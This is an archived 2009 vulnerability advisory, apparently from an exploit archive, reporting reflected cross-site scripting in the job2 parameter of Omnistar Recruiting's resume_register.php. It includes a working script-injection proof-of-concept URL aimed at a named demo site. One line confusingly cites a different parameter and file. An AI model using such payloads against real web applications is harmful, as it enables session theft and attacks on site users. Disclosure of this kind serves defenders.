Omnistar Recruiting Cross Site Scripting

Omnistar Recruiting Cross Site Scripting: Posted Aug 5, 2009; Authored by MizoZ; Omnistar Recruiting suffers from a cross site scripting vulnerability in resume_register.php.; tags | exploit, php, xss; SHA-256 | 3af800af3425dd707ba3bb4ab3ad980baaff28cf7ba65639b49d7a987f264e80; Download | Favorite | View

Omnistar Recruiting Cross Site Scripting

/*

Omnistar Recruiting (resume_register.php job2) XSS Vulnerability

Discovered by : MizoZ
Contact : mizoz@9.cn <mizozx@gmail.com>
Team : EvilWay

Date : July 29 2009

Greetings : Moudi , Zuka, All friends

*/
We can inject HTML code on the GET (SearchWd) in faille search_advance.php .

[HOST]/[PATH]/users/resume_register.php?job2=>[XSS]

Ex :
http://www.mywebetools.com/demo_recruiter8/users/resume_register.php?job2=%3E%3Cscript%3Ealert%281%29%3C/script%3E

Top Authors In Last 30 Days

Red Hat 237 files
indoushka 157 files
Jay Turla 150 files
Ubuntu 68 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,119)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,136)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,775)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,828)
UNIX (9,454)
UnixWare (188)
Windows (6,766)
Other

Omnistar Recruiting Cross Site Scripting

Omnistar Recruiting Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Omnistar Recruiting Cross Site Scripting

Share This

Omnistar Recruiting Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems